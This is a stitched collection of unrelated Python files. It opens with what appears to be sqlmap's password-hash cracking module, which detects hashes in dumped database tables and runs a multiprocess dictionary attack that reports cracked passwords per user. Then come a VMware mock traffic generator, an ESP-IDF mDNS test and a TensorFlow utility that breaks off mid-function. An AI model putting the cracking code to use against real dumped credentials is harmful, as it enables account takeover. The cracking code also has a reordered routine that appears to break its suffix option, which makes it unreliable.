def sha1_generic_passwd(password, uppercase=False):
"""
>>> sha1_generic_passwd(password='testpass', uppercase=False)
'206c80413b9a96c1312cc346b7d2517b84463edd'
"""
retVal = sha1(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def sha224_generic_passwd(password, uppercase=False):
"""
>>> sha224_generic_passwd(password='testpass', uppercase=False)
'648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f'
"""
retVal = sha224(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def sha384_generic_passwd(password, uppercase=False):
"""
>>> sha384_generic_passwd(password='testpass', uppercase=False)
'6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf'
"""
retVal = sha384(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def sha512_generic_passwd(password, uppercase=False):
"""
>>> sha512_generic_passwd(password='testpass', uppercase=False)
'78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44'
"""
retVal = sha512(password).hexdigest()
return retVal.upper() if uppercase else retVal.lower()
def crypt_generic_passwd(password, salt, uppercase=False):
"""
Reference(s):
http://docs.python.org/library/crypt.html
http://helpful.knobs-dials.com/index.php/Hashing_notes
http://php.net/manual/en/function.crypt.php
http://carey.geek.nz/code/python-fcrypt/
>>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False)
'rl.3StKT.4T8M'
"""
retVal = crypt(password, salt)
return retVal.upper() if uppercase else retVal
def wordpress_passwd(password, salt, count, prefix, uppercase=False):
"""
Reference(s):
http://packetstormsecurity.org/files/74448/phpassbrute.py.txt
http://scriptserver.mainframe8.com/wordpress_password_hasher.php
>>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp', uppercase=False)
'$P$9aD9ZLmkpsN4A83G8MefaaP888gVKX0'
"""
def _encode64(input_, count):
output = ''
i = 0
while i < count:
value = ord(input_[i])
i += 1
output = output + ITOA64[value & 0x3f]
if i < count:
value = value | (ord(input_[i]) << 8)
output = output + ITOA64[(value >> 6) & 0x3f]
i += 1
if i >= count:
break
if i < count:
value = value | (ord(input_[i]) << 16)
output = output + ITOA64[(value >> 12) & 0x3f]
i += 1
if i >= count:
break
output = output + ITOA64[(value >> 18) & 0x3f]
return output
if isinstance(password, unicode):
password = password.encode(UNICODE_ENCODING)
cipher = md5(salt)
cipher.update(password)
hash_ = cipher.digest()
for i in xrange(count):
_ = md5(hash_)
_.update(password)
hash_ = _.digest()
retVal = prefix + _encode64(hash_, 16)
return retVal.upper() if uppercase else retVal
__functions__ = {
HASH.MYSQL: mysql_passwd,
HASH.MYSQL_OLD: mysql_old_passwd,
HASH.POSTGRES: postgres_passwd,
HASH.MSSQL: mssql_passwd,
HASH.MSSQL_OLD: mssql_old_passwd,
HASH.MSSQL_NEW: mssql_new_passwd,
HASH.ORACLE: oracle_passwd,
HASH.ORACLE_OLD: oracle_old_passwd,
HASH.MD5_GENERIC: md5_generic_passwd,
HASH.SHA1_GENERIC: sha1_generic_passwd,
HASH.SHA224_GENERIC: sha224_generic_passwd,
HASH.SHA384_GENERIC: sha384_generic_passwd,
HASH.SHA512_GENERIC: sha512_generic_passwd,
HASH.CRYPT_GENERIC: crypt_generic_passwd,
HASH.WORDPRESS: wordpress_passwd,
}
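# Illustrative dispatch example (not part of the original file): the cracking
# helpers below look up the candidate-hash function for a recognized hash type
# through this mapping, e.g.:
#
#     >>> __functions__[HASH.MD5_GENERIC](password='testpass', uppercase=False)
#     '179ad45c6ce2cb97cf1029e212046e81'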
def storeHashesToFile(attack_dict):
if not attack_dict:
return
if kb.storeHashesChoice is None:
message = "do you want to store hashes to a temporary file "
message += "for eventual further processing with other tools [y/N] "
kb.storeHashesChoice = readInput(message, default='N', boolean=True)
if not kb.storeHashesChoice:
return
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt")
os.close(handle)
infoMsg = "writing hashes to a temporary file '%s' " % filename
logger.info(infoMsg)
items = set()
with open(filename, "w+") as f:
for user, hashes in attack_dict.items():
for hash_ in hashes:
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
if hash_ and hash_ != NULL and hashRecognition(hash_):
item = None
if user and not user.startswith(DUMMY_USER_PREFIX):
item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING))
else:
item = "%s\n" % hash_.encode(UNICODE_ENCODING)
if item and item not in items:
f.write(item)
items.add(item)
def attackCachedUsersPasswords():
if kb.data.cachedUsersPasswords:
results = dictionaryAttack(kb.data.cachedUsersPasswords)
lut = {}
for (_, hash_, password) in results:
lut[hash_.lower()] = password
for user in kb.data.cachedUsersPasswords.keys():
for i in xrange(len(kb.data.cachedUsersPasswords[user])):
if (kb.data.cachedUsersPasswords[user][i] or "").strip():
value = kb.data.cachedUsersPasswords[user][i].lower().split()[0]
if value in lut:
kb.data.cachedUsersPasswords[user][i] += "%s clear-text password: %s" % ('\n' if kb.data.cachedUsersPasswords[user][i][-1] != '\n' else '', lut[value])
def attackDumpedTable():
if kb.data.dumpedTable:
table = kb.data.dumpedTable
columns = table.keys()
count = table["__infos__"]["count"]
if not count:
return
infoMsg = "analyzing table dump for possible password hashes"
logger.info(infoMsg)
found = False
col_user = ''
col_passwords = set()
attack_dict = {}
for column in columns:
if column and column.lower() in COMMON_USER_COLUMNS:
col_user = column
break
for i in xrange(count):
if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD:
break
for column in columns:
if column == col_user or column == '__infos__':
continue
if len(table[column]['values']) <= i:
continue
value = table[column]['values'][i]
if hashRecognition(value):
found = True
if col_user and i < len(table[col_user]['values']):
if table[col_user]['values'][i] not in attack_dict:
attack_dict[table[col_user]['values'][i]] = []
attack_dict[table[col_user]['values'][i]].append(value)
else:
attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value]
col_passwords.add(column)
if attack_dict:
infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "")
infoMsg += "'%s'" % ", ".join(col for col in col_passwords)
logger.info(infoMsg)
storeHashesToFile(attack_dict)
message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]")
choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper()
if choice == 'N':
return
elif choice == 'Q':
raise SqlmapUserQuitException
results = dictionaryAttack(attack_dict)
lut = dict()
for (_, hash_, password) in results:
if hash_:
lut[hash_.lower()] = password
infoMsg = "postprocessing table dump"
logger.info(infoMsg)
for i in xrange(count):
for column in columns:
if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i):
value = table[column]['values'][i]
if value and value.lower() in lut:
table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()]))
table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))
def hashRecognition(value):
retVal = None
isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL)
if isinstance(value, basestring):
for name, regex in getPublicTypeMembers(HASH):
# Hashes for Oracle and old MySQL look the same hence these checks
if isOracle and regex == HASH.MYSQL_OLD:
continue
elif isMySQL and regex == HASH.ORACLE_OLD:
continue
elif regex == HASH.CRYPT_GENERIC:
if any((value.lower() == value, value.upper() == value)):
continue
elif re.match(regex, value):
retVal = regex
break
return retVal
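# A minimal usage sketch for hashRecognition() (values are illustrative, not taken from a real target):
# a 32-character hexadecimal string such as '5f4dcc3b5aa765d61d8327deb882cf99' is expected to match the
# generic MD5 regex (HASH.MD5_GENERIC), a value like '*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19' the
# HASH.MYSQL regex, while a non-hash value (e.g. 'foobar') makes the function return None.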
def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api):
if IS_WIN:
coloramainit()
count = 0
rotator = 0
hashes = set([item[0][1] for item in attack_info])
wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist)
try:
for word in wordlist:
if not attack_info:
break
if not isinstance(word, basestring):
continue
if suffix:
word = word + suffix
try:
current = __functions__[hash_regex](password=word, uppercase=False)
count += 1
if current in hashes:
for item in attack_info[:]:
((user, hash_), _) = item
if hash_ == current:
retVal.put((user, hash_, word))
clearConsoleLine()
infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word)
if user and not user.startswith(DUMMY_USER_PREFIX):
infoMsg += " for user '%s'\n" % user
else:
infoMsg += " for hash '%s'\n" % hash_
dataToStdout(infoMsg, True)
attack_info.remove(item)
elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN:
rotator += 1
if rotator >= len(ROTATING_CHARS):
rotator = 0
status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator])
if not api:
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status))
except KeyboardInterrupt:
raise
except (UnicodeEncodeError, UnicodeDecodeError):
pass # ignore possible encoding problems caused by some words in custom dictionaries
except Exception, e:
warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
logger.critical(warnMsg)
except KeyboardInterrupt:
pass
finally:
if hasattr(proc_count, "value"):
with proc_count.get_lock():
proc_count.value -= 1
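# Note (inferred from the call sites in dictionaryAttack below): variant A handles the unsalted hash
# types (MySQL, old MySQL, generic MD5/SHA1), so one pass over the wordlist is checked against the whole
# set of collected hashes at once; variant B is invoked once per (user, hash) pair because the remaining
# formats need per-hash keyword arguments such as a salt or username.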
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api):
if IS_WIN:
coloramainit()
count = 0
rotator = 0
wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist)
try:
for word in wordlist:
if found.value:
break
current = __functions__[hash_regex](password=word, uppercase=False, **kwargs)
count += 1
if not isinstance(word, basestring):
continue
if suffix:
word = word + suffix
try:
if hash_ == current:
if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes
word = word.upper()
retVal.put((user, hash_, word))
clearConsoleLine()
infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word)
if user and not user.startswith(DUMMY_USER_PREFIX):
infoMsg += " for user '%s'\n" % user
else:
infoMsg += " for hash '%s'\n" % hash_
dataToStdout(infoMsg, True)
found.value = True
elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0:
rotator += 1
if rotator >= len(ROTATING_CHARS):
rotator = 0
status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator])
if user and not user.startswith(DUMMY_USER_PREFIX):
status += ' (user: %s)' % user
if not api:
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status))
except KeyboardInterrupt:
raise
except (UnicodeEncodeError, UnicodeDecodeError):
pass # ignore possible encoding problems caused by some words in custom dictionaries
except Exception, e:
warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
logger.critical(warnMsg)
except KeyboardInterrupt:
pass
finally:
if hasattr(proc_count, "value"):
with proc_count.get_lock():
proc_count.value -= 1
def dictionaryAttack(attack_dict):
suffix_list = [""]
custom_wordlist = [""]
hash_regexes = []
results = []
resumes = []
user_hash = []
processException = False
foundHash = False
for (_, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
regex = hashRecognition(hash_)
if regex and regex not in hash_regexes:
hash_regexes.append(regex)
infoMsg = "using hash method '%s'" % __functions__[regex].func_name
logger.info(infoMsg)
for hash_regex in hash_regexes:
keys = set()
attack_info = []
for (user, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
foundHash = True
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
if re.match(hash_regex, hash_):
item = None
if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS):
hash_ = hash_.lower()
if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC):
item = [(user, hash_), {}]
elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES):
item = [(user, hash_), {'username': user}]
elif hash_regex in (HASH.ORACLE,):
item = [(user, hash_), {'salt': hash_[-20:]}]
elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW):
item = [(user, hash_), {'salt': hash_[6:14]}]
elif hash_regex in (HASH.CRYPT_GENERIC,):
item = [(user, hash_), {'salt': hash_[0:2]}]
elif hash_regex in (HASH.WORDPRESS,):
if ITOA64.index(hash_[3]) < 32:
item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}]
else:
warnMsg = "invalid hash '%s'" % hash_
logger.warn(warnMsg)
if item and hash_ not in keys:
resumed = hashDBRetrieve(hash_)
if not resumed:
attack_info.append(item)
user_hash.append(item[0])
else:
infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_)
if user and not user.startswith(DUMMY_USER_PREFIX):
infoMsg += " for user '%s'" % user
logger.info(infoMsg)
resumes.append((user, hash_, resumed))
keys.add(hash_)
if not attack_info:
continue
if not kb.wordlists:
while not kb.wordlists:
# the slowest of all methods hence smaller default dict
if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS):
dictPaths = [paths.SMALL_DICT]
else:
dictPaths = [paths.WORDLIST]
message = "what dictionary do you want to use?\n"
message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0]
message += "[2] custom dictionary file\n"
message += "[3] file with list of dictionary files"
choice = readInput(message, default='1')
try:
if choice == '2':
message = "what's the custom dictionary's location?\n"
_ = readInput(message)
if _:
dictPaths = [readInput(message)]
logger.info("using custom dictionary")
elif choice == '3':
message = "what's the list file location?\n"
listPath = readInput(message)
checkFile(listPath)
dictPaths = getFileItems(listPath)
logger.info("using custom list of dictionaries")
else:
logger.info("using default dictionary")
dictPaths = filter(None, dictPaths)
for dictPath in dictPaths:
checkFile(dictPath)
if os.path.splitext(dictPath)[1].lower() == ".zip":
_ = zipfile.ZipFile(dictPath, 'r')
if len(_.namelist()) == 0:
errMsg = "no file(s) inside '%s'" % dictPath
raise SqlmapDataException(errMsg)
else:
_.open(_.namelist()[0])
kb.wordlists = dictPaths
except Exception, ex:
warnMsg = "there was a problem while loading dictionaries"
warnMsg += " ('%s')" % getSafeExString(ex)
logger.critical(warnMsg)
message = "do you want to use common password suffixes? (slow!) [y/N] "
if readInput(message, default='N', boolean=True):
suffix_list += COMMON_PASSWORD_SUFFIXES
infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name
logger.info(infoMsg)
for item in attack_info:
((user, _), _) = item
if user and not user.startswith(DUMMY_USER_PREFIX):
custom_wordlist.append(normalizeUnicode(user))
if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC):
for suffix in suffix_list:
if not attack_info or processException:
break
if suffix:
clearConsoleLine()
infoMsg = "using suffix '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = "starting %d processes " % _multiprocessing.cpu_count()
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
else:
warnMsg = "multiprocessing hash cracking is currently "
warnMsg += "not supported on this platform"
singleTimeWarnMessage(warnMsg)
retVal = Queue()
_bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api)
except KeyboardInterrupt:
print
processException = True
warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(block=False)
attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
else:
for ((user, hash_), kwargs) in attack_info:
if processException:
break
if any(_[0] == user and _[1] == hash_ for _ in results):
continue
count = 0
found = False
for suffix in suffix_list:
if found or processException:
break
if suffix:
clearConsoleLine()
infoMsg = "using suffix '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = "starting %d processes " % _multiprocessing.cpu_count()
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
found_ = _multiprocessing.Value('i', False)
count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
found = found_.value != 0
else:
warnMsg = "multiprocessing hash cracking is currently "
warnMsg += "not supported on this platform"
singleTimeWarnMessage(warnMsg)
class Value():
pass
retVal = Queue()
found_ = Value()
found_.value = False
_bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api)
found = found_.value
except KeyboardInterrupt:
print
processException = True
warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(block=False)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
results.extend(resumes)
if foundHash and len(hash_regexes) == 0:
warnMsg = "unknown hash format"
logger.warn(warnMsg)
if len(results) == 0:
warnMsg = "no clear password(s) found"
logger.warn(warnMsg)
return results
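# A minimal usage sketch (hypothetical input, shown only for illustration): calling
#     dictionaryAttack({'admin': ['5f4dcc3b5aa765d61d8327deb882cf99']})
# prompts for a wordlist, runs the cracking loops above and returns a list of
# (user, hash, password) tuples for every hash that was cracked or resumed from the session file.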
|
mocktraffic.py
|
#!/usr/bin/env python
# Copyright (c) 2020-2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2 License
# The full license information can be found in LICENSE.txt
# in the root directory of this project.
import logging
import os
import queue
import threading
import time
from lydian.apps.base import BaseApp, exposify
from lydian.traffic.core import TrafficRecord, TrafficRule
from lydian.utils.common import get_mgmt_ifname
from lydian.utils.network_utils import InterfaceManager
log = logging.getLogger(__name__)
@exposify
class MockTraffic(BaseApp):
REPORT_INTERVAL = 5
def __init__(self, rqueue, interval=None, proc_name='runner'):
"""
        A mock traffic generator that creates a dummy TrafficRecord for each
        registered rule and puts it on the records queue at the requested interval.
"""
self._rqueue = rqueue # records queue to put records onto.
self._interval = interval or self.REPORT_INTERVAL
self._stop_switch = threading.Event()
self._stop_switch.set() # Stopped until started.
self._thread = None
self._dummy_rule = {}
# Host is where this app is running. Based on host,
# it is decided for a rule if we need to run a client
# or server.
ifname = get_mgmt_ifname()
self.host = InterfaceManager().get_interface(ifname)['address']
@property
def enabled(self):
return not self._stop_switch.is_set()
def register_traffic(self, rules):
for rule in rules:
if not isinstance(rule, TrafficRule):
log.error("Improper rule : %r", rule)
continue
if self.host == rule.src_host:
# For client side just do a bookkeeping.
self._dummy_rule[rule.ruleid] = rule
if self.host == rule.dst_host: # Noop for server
continue
log.info("Registered traffic : %r", rule.ruleid)
def ping(self):
while not self._stop_switch.is_set():
# Put logic for running traffic here.
# Process the response and create Traffic Record
# like below and put on the queue. It will be pushed
# onto corresponding databases.
for ruleid, trule in self._dummy_rule.items():
# as an example, create dummy records for each ruleid
# asked to be handled by this tool.
try:
rec = TrafficRecord()
rec.source = '0.0.0.0'
rec.destination = '0.0.0.0'
rec.protocol = 'TCP'
rec.port = '00'
rec.result = True
rec.reqid = trule.reqid
rec.ruleid = ruleid
rec.latency = '0'
self._rqueue.put(rec, block=False, timeout=2)
log.info("Traffic: %r", rec)
except queue.Full as err:
log.error("Cann't put Traffic Record %r into the queue: %r",
rec, err)
except Exception as err:
log.error("Error in puytting dummy records %r ", err, exc_info=err)
time.sleep(self._interval)
def is_running(self):
"""
        Returns True if the mock traffic thread is running, else False.
"""
return self._thread and self._thread.is_alive()
def start_traffic(self, trule):
self._dummy_rule[trule.ruleid] = trule
log.info("Starting traffic for rule : %s", trule.ruleid)
def stop_traffic(self, trule):
self._dummy_rule.pop(trule.ruleid)
log.info("Stopped traffic for rule : %s", trule.ruleid)
def stop(self):
"""
        Stops mock traffic generation.
"""
self._stop_switch.set()
if self.is_running():
self._thread.join()
self._thread = None
log.info("Stopped resource monitoring.")
def start(self):
"""
        Starts mock traffic generation (in a separate thread).
"""
self._stop_switch.clear()
if not self._thread:
self._thread = threading.Thread(target=self.ping)
self._thread.setDaemon(True)
self._thread.start()
log.info("Started resource monitoring.")
|
mdns_example_test.py
|
import re
import os
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
from tiny_test_fw import DUT
import ttfw_idf
# g_run_server = True
# g_done = False
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
    dns.an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns_lwip(tester_host, id):
dns = dpkt.dns.DNS(b"\x5e\x39\x84\x00\x00\x01\x00\x01\x00\x00\x00\x00\x0a\x64\x61\x76\x69\x64"
b"\x2d\x63\x6f\x6d\x70\x05\x6c\x6f\x63\x61\x6c\x00\x00\x01\x00\x01\xc0\x0c"
b"\x00\x01\x00\x01\x00\x00\x00\x0a\x00\x04\xc0\xa8\x0a\x6c")
dns.qd[0].name = tester_host
dns.an[0].name = tester_host
dns.an[0].ip = socket.inet_aton('127.0.0.1')
dns.an[0].rdata = socket.inet_aton('127.0.0.1')
dns.id = id
print("Created answer to mdns (lwip) query: {} ".format(dns.__repr__()))
return dns.pack()
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
TESTER_NAME_LWIP = u'tinytester-lwip.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
elif dns.qd[0].name == TESTER_NAME_LWIP:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns_lwip(TESTER_NAME_LWIP, dns.id), addr)
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
global stop_mdns_server
"""
steps: |
1. join AP + init mdns example
2. get the dut host name (and IP address)
3. check the mdns name is accessible
4. check DUT output if mdns advertized host is resolved
"""
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("mdns-test_bin_size", bin_size // 1024)
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
except DUT.ExpectTimeout:
stop_mdns_server.set()
thread1.join()
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
# 4. check DUT output if mdns advertized host is resolved
try:
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: gethostbyname: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
dut1.expect(re.compile(r"mdns-test: getaddrinfo: tinytester-lwip.local resolved to: 127.0.0.1"), timeout=30)
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
tf_util.py
|
"""
Taken from https://github.com/openai/baselines
"""
import collections
import copy
import functools
import multiprocessing
import os
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
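# Worked example (assuming delta=1.0): for |x| <= 1 the loss is quadratic, e.g. x=0.5 gives
# 0.5 * 0.5**2 = 0.125; for |x| > 1 it grows linearly, e.g. x=3.0 gives 1.0 * (3.0 - 0.5) = 2.5.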
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
